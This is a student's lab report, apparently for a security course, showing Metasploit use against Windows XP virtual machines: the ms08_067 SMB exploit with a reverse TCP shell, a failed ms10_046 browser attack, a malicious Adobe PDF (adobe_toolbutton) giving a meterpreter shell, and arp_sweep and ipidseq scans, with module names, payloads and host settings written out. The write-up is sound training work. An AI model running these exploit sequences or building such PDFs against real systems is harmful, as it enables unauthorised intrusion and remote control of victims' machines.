zoukankan      html  css  js  c++  java
  • 20155205 郝博雅 Exp5 MSF基础应用

    20155205 郝博雅 Exp5 MSF基础应用

    一、实验目标

    • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

      1.一个主动攻击实践,如ms08_067; (1分)

      1. 一个针对浏览器的攻击,如ms11_050;(1分)

      2. 一个针对客户端的攻击,如Adobe;(1分)

      3. 成功应用任何一个辅助模块。(0.5分)

    基础问题回答:用自己的话解释什么是exploit,payload,encode?

    • exploit相当于一个载体,把攻击代码运送到耙机中;payload相当于shellcode;encode一是为了避免payload中出现坏字符,从而影响payload的功能,二是为了实现免杀。

    二、实验内容

    主动攻击:ms08_067漏洞攻击

    靶机: windows XP SP3(English)

    攻击机:kali

    • 输入msfconsole进入控制台,输入search ms08_067指令查询一下针对该漏洞可以运用的攻击模块:

    • 输入use exploit/windows/smb/ms08_067_netapi使用该模块:

    • 使用show payloads查看可以供我们使用的payload并找到一个可用的攻击载荷:

    • set payload generic/shell_reverse_tcp即tcp反向回连设置payload

    • 使用指令show options查看我们需要设置的参数,需要设置一个RHOST(靶机的IP地址)和一个LHOST(攻击机的IP地址)。并且看到target是0,即自动选择目标系统类型,就不用再设置了。

    • 使用set LHOST 192.168.206.129set LPORT 5205设置本机地址和端口,使用set RHOST 192.168.206.135 设置耙机地址,使用show options查看设置结果:

    • 接着使用exploit指令开始攻击,出现了一个错误:

    • 关闭XP的防火墙:

    • 攻击成功,获取了耙机的shell:

    对浏览器攻击:ms10_046漏洞攻击

    攻击机:kali
    靶机:windowsXP Professional sp2
    IE:8.0

    • search ms10_046指令查看可以运用的攻击模块,进入模块后将SRVHOST和LHOST填攻击机的IP地址,在ip浏览器中输入生成的URL后会出错:

    • 这个错误很多人都遇到了,也没有解决,算一个失败的例子吧,不过老师不是说攻击百分之九十都是失败么

    对Adobe的漏洞攻击:adobe_toolbutton

    攻击机:kali
    靶机:windowsXP Professional sp2
    Adobe版本:9.3

    • 先输入search adobe查询针对adobe攻击的模块,使用use exploit/windows/fileformat/adobe_toolbutton,使用set payload windows/meterpreter/reverse_tcp设置payload

    • show options看一下需要设置的参数

    • 设置好参数后输入exploit开始攻击,可以看到生成了pdf文件。

    • 将pdf文件拷到xp里,在kali上输入back退出当前模块,进入监听模块
    • 在靶机上打开pdf文件

    • 可以看到攻击成功,获取了xp的shell

    • 强行关闭了pdf文件后,可以看到监听的会话被关闭了。

    辅助模块的应用1:arp_sweep

    • 先使用show auxiliary查看w所有的辅助模块以及他们的用途,在metasploit中,辅助模块的用途非常广泛,他们可以是扫描器/拒绝服务攻击工具/fuzz测试器,以及其他类型的工具。

    • 模块实在是太多了,找了很多个但搜索了一下做起来都比较困难,因此使用show scanner找一个比较简单一点的,最后选择了arp_sweep。可以参考(MSF内网渗透 扫描模块

    • arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描。进入模块后查询一下参数

    msf > use auxiliary/scanner/discovery/arp_sweep   ---进入arp_sweep 模块
    msf auxiliary(arp_sweep) > show options  ---查询模块参数
    
    

    之后进行参数设置

    msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24--用set进行hosts主机段设置
    RHOSTS => 10.10.10.0/24
    msf auxiliary(arp_sweep) > set THREADS 50 --加快扫描速度
    THREADS => 50
    msf auxiliary(arp_sweep) > run --执行run进行扫描
    
    • 因为我只开了一个虚拟机,所以只扫到了一个活跃机。

    • 但里面那个 10.43.32.1 appears to be up (USC INFORMATION SCIENCES INST).是啥呢??查了一下后面英文的意思是加利福尼亚大学洛杉矶分校。。。

    辅助模块的应用2:ipidseq

    • 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
    • 老规矩,先search ipidseq后选择相应模块,查看需要设置的参数:

    • 设置参数后exploit,扫描成功

    • 还可以扫描一个网段,因为等待时间太长了只截了部分结果:

    db_autopwn实战

  • 相关阅读:
    字符串String
    冒泡排序、二分查找法
    数组习题
    数组
    附加习题
    编写Java程序,应用for循环打印菱形、三角形
    JAVA的语法基础4
    3.20 每日一题题解
    3.19 每日一题题解
    3.18 每日一题题解
  • 原文地址:https://www.cnblogs.com/haoliberale/p/8877298.html
Copyright © 2011-2022 走看看